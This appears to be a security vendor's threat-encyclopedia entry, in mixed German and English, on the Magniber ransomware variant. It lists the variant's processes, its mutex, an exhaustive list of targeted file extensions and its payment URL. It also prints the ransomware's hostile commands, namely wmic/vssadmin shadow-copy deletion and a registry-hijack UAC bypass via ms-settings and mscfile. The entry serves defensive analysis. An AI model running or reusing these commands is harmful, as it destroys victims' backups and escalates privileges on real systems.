Ransom.Win64.MAGNIBER.C

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Diese Malware hat keine Verbreitungsroutine.

Diese Malware hat keine Backdoor-Routine.

Sammelt bestimmte Informationen auf dem betroffenen Computer.

Leitet Browser zu bestimmten Websites um.

Übertragungsdetails

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

Fügt die folgenden Prozesse hinzu:

• Display ransom note:
  • notepad.exe %Public%\readme.txt
• Open payment page through browser:
  • cmd /c "start http://{Random characters}kynscshsn.{BLOCKED}s.uno/kynscshsn&{string1}&{string2}&{string3}&{string4}&{string5} "
    • where
    • string1
    • The number of drives in which the ransomware has enumerated files
    • string2
    • Total size of encrypted data has generated in bytes
    • string3
    • The number of files it encrypts
    • string4
    • The number of file it enumerates
    • string5
    • The build number of the comprimised windows OS
• %System%\wbem\wmic process call create "vssadmin. exe Delete Shadows /all /quiet" → deletes shadow copies
• cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"" → If running on Win10
• cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"" → if running on Windows versions < Win10

Fügt sich in die folgenden Prozesse ein, die im Speicher des betroffenen Systems ausgeführt werden:

• It injects into each process if the ff. criteria is met:
  • The process is not iexplore.exe

Fügt die folgenden Mutexe hinzu, damit nur jeweils eine ihrer Kopien ausgeführt wird:

• kynscshsn

Andere Systemänderungen

Fügt die folgenden Registrierungseinträge hinzu:

if running on Win10:
HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
(Default) = regsvr32.exe scrobj.dll /s /u /n /i:%Public%\readme.txt → initial registry entry where file originally contains code to delete shadow files

HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
(Default) = %System%\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
DelegateExecute = 0

if running on Windows versions < Win10:
HKEY_CURRENT_USER\Software\Classes\
mscfile\shell\open\
command
(Default) = %System%\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

Verbreitung

Diese Malware hat keine Verbreitungsroutine.

Backdoor-Routine

Diese Malware hat keine Backdoor-Routine.

Datendiebstahl

Sammelt die folgenden Informationen auf dem betroffenen Computer:

• The number of drives it enumerates
• Total size of encrypted data
• The number of encrypted files
• The number of enumerated files
• Build number of the compromised windows operating system

Andere Details

Verschlüsselt Dateien mit den folgenden Erweiterungen:

• abm
• abs
• abw
• accdb
• act
• adn
• adp
• aes
• aft
• afx
• agif
• agp
• ahd
• ai
• aic
• aim
• albm
• alf
• ans
• apd
• apm
• apng
• aps
• apt
• apx
• arc
• art
• arw
• asc
• ase
• asf
• ask
• asm
• asp
• asw
• asy
• aty
• avi
• awdb
• awp
• awt
• aww
• azz
• bad
• bak
• bay
• bbs
• bdb
• bdp
• bdr
• bean
• bib
• bmp
• bmx
• bna
• bnd
• boc
• bok
• brd
• brk
• brn
• brt
• bss
• btd
• bti
• btr
• c
• ca
• cals
• can
• cd
• cdb
• cdc
• cdg
• cdmm
• cdmt
• cdmz
• cdr
• cdt
• cf
• cfu
• cgm
• cimg
• cin
• cit
• ckp
• class
• clkw
• cma
• cmx
• cnm
• cnv
• colz
• cpc
• cpd
• cpg
• cpp
• cps
• cpx
• crd
• crt
• crw
• cs
• csr
• csv
• csy
• ct
• cvg
• cvi
• cvs
• cvx
• cwt
• cxf
• cyi
• dad
• daf
• db
• dbc
• dbf
• dbk
• dbs
• dbt
• dbv
• dbx
• dca
• dcb
• dch
• dcr
• dcs
• dct
• dcx
• dd
• dds
• ded
• der
• dgn
• dgs
• dgt
• dhs
• dib
• dif
• dip
• diz
• djv
• djvu
• dmi
• dmo
• dnc
• dne
• doc
• docb
• docm
• docx
• docz
• dot
• dotm
• dotx
• dpp
• dpx
• dqy
• drw
• drz
• dsk
• dsn
• dsv
• dt
• dta
• dtsx
• dtw
• dv
• dvi
• dwg
• dx
• dxb
• dxf
• eco
• ecw
• ecx
• edb
• efd
• egc
• eio
• eip
• eit
• em
• emd
• emf
• emlx
• ep
• epf
• epp
• eps
• epsf
• eq
• erf
• err
• etf
• etx
• euc
• exr
• fa
• faq
• fax
• fb
• fbx
• fcd
• fcf
• fdf
• fdr
• fds
• fdt
• fdx
• fdxt
• fes
• fft
• fi
• fic
• fid
• fif
• fig
• fla
• flr
• flv
• fmv
• fo
• fodt
• fpos
• fpt
• fpx
• frm
• frt
• frx
• ftn
• fwdn
• fxc
• fxg
• fzb
• fzv
• gcdp
• gdb
• gdoc
• gem
• geo
• gfb
• gfie
• ggr
• gif
• gih
• gim
• gio
• glox
• gpd
• gpg
• gpn
• gro
• grob
• grs
• gsd
• gthr
• gtp
• gv
• gwi
• gz
• h
• hbk
• hdb
• hdp
• hdr
• hht
• his
• hp
• hpg
• hpi
• hs
• htc
• hwp
• hz
• ib
• ibd
• icn
• icon
• icpr
• idc
• idea
• idx
• igt
• igx
• ihx
• ii
• iiq
• imd
• info
• ink
• ipf
• ipx
• iso
• itdb
• itw
• iwi
• j
• jar
• jas
• java
• jbig
• jbmp
• jbr
• jfif
• jia
• jis
• jng
• joe
• jpe
• jpeg
• jpg
• jps
• jpx
• jrtf
• js
• jsp
• jtf
• jtx
• jw
• jxr
• kdb
• kdbx
• kdc
• kdi
• kdk
• kes
• key
• kic
• klg
• knt
• kon
• kpg
• kwd
• lay
• lbm
• lbt
• ldf
• lgc
• lis
• lit
• ljp
• lmk
• lnt
• lrc
• lst
• ltr
• ltx
• lue
• luf
• lwo
• lwp
• lws
• lyt
• lyx
• ma
• mac
• man
• map
• maq
• mat
• max
• mb
• mbm
• mbox
• mdb
• mdf
• mdn
• mdt
• me
• mef
• mel
• mft
• mgcb
• mgmf
• mgmt
• mgmx
• mgtx
• mid
• min
• mkv
• mm
• mmat
• mnr
• mnt
• mos
• mov
• mpeg
• mpf
• mpg
• mpo
• mrg
• mrxs
• msg
• mud
• mwb
• mwp
• mx
• my
• myd
• myi
• ncr
• nct
• ndf
• nef
• nfo
• njx
• nlm
• now
• nrw
• nsf
• nyf
• nzb
• obj
• oce
• oci
• ocr
• odb
• odg
• odm
• odo
• odp
• ods
• odt
• of
• oft
• omf
• oplc
• oqy
• ora
• orf
• ort
• orx
• ost
• ota
• otg
• oti
• otp
• ots
• ott
• ovp
• ovr
• owc
• owg
• oyx
• ozb
• ozj
• ozt
• p
• pa
• pan
• pano
• pap
• paq
• pas
• pbm
• pcd
• pcs
• pdb
• pdd
• pdf
• pdm
• pds
• pdt
• pef
• pem
• pff
• pfi
• pfs
• pfv
• pfx
• pgf
• pgm
• phm
• php
• pic
• pict
• pix
• pjpg
• pjt
• plt
• pm
• pmg
• png
• pni
• pnm
• pntg
• pnz
• pobj
• pop
• pot
• potm
• potx
• ppam
• ppm
• pps
• ppsm
• ppsx
• ppt
• pptm
• pptx
• prt
• prw
• psd
• psdx
• pse
• psid
• psp
• pst
• psw
• ptg
• pth
• ptx
• pu
• pvj
• pvm
• pvr
• pwa
• pwi
• pwr
• px
• pxr
• pza
• pzp
• pzs
• qd
• qmg
• qpx
• qry
• qvd
• rad
• rar
• ras
• raw
• rb
• rctd
• rcu
• rd
• rdb
• rft
• rgb
• rgf
• rib
• ric
• riff
• ris
• rix
• rle
• rli
• rng
• rpd
• rpf
• rpt
• rri
• rs
• rsb
• rsd
• rsr
• rst
• rt
• rtd
• rtf
• rtx
• run
• rw
• rzk
• rzn
• saf
• sam
• sbf
• scad
• scc
• sch
• sci
• scm
• sct
• scv
• scw
• sdb
• sdf
• sdm
• sdoc
• sdw
• sep
• sfc
• sfw
• sgm
• sh
• sig
• skm
• sla
• sld
• sldm
• sldx
• slk
• sln
• sls
• smf
• sms
• snt
• sob
• spa
• spe
• sph
• spj
• spp
• spq
• spr
• sq
• sqb
• srw
• ssa
• ssk
• st
• stc
• std
• sti
• stm
• stn
• stp
• str
• stw
• sty
• sub
• suo
• svf
• svg
• svgz
• swf
• sxc
• sxd
• sxg
• sxi
• sxm
• sxw
• tab
• tar
• tbk
• tcx
• tdf
• tdt
• te
• tex
• text
• tgz
• thp
• tif
• tiff
• tlb
• tlc
• tm
• tmd
• tmv
• tmx
• tne
• tpc
• trm
• tvj
• udb
• ufr
• unx
• uof
• uop
• uot
• upd
• usr
• utxt
• vb
• vbr
• vbs
• vcd
• vct
• vdb
• vdi
• vec
• vm
• vmdk
• vmx
• vnt
• vob
• vpd
• vrm
• vrp
• vsd
• vsdm
• vsdx
• vsm
• vstm
• vstx
• vue
• vw
• wav
• wbk
• wcf
• wdb
• wgz
• wire
• wks
• wma
• wmdb
• wmv
• wn
• wp
• wpa
• wpd
• wpg
• wps
• wpt
• wpw
• wri
• wsc
• wsd
• wsh
• wtx
• x
• xar
• xd
• xdb
• xlc
• xld
• xlf
• xlgc
• xlm
• xls
• xlsb
• xlsm
• xlsx
• xlt
• xltm
• xltx
• xlw
• xps
• xwp
• xyp
• xyw
• ya
• ybk
• ym
• zabw
• zdb
• zdc
• zip
• zw

Leitet Browser zu folgenden Websites um:

• http://{Random characters}kynscshsn.{BLOCKED}s.uno/kynscshsn&{string1}&{string2}&{string3}&{string4}&{string5} → connects to payment page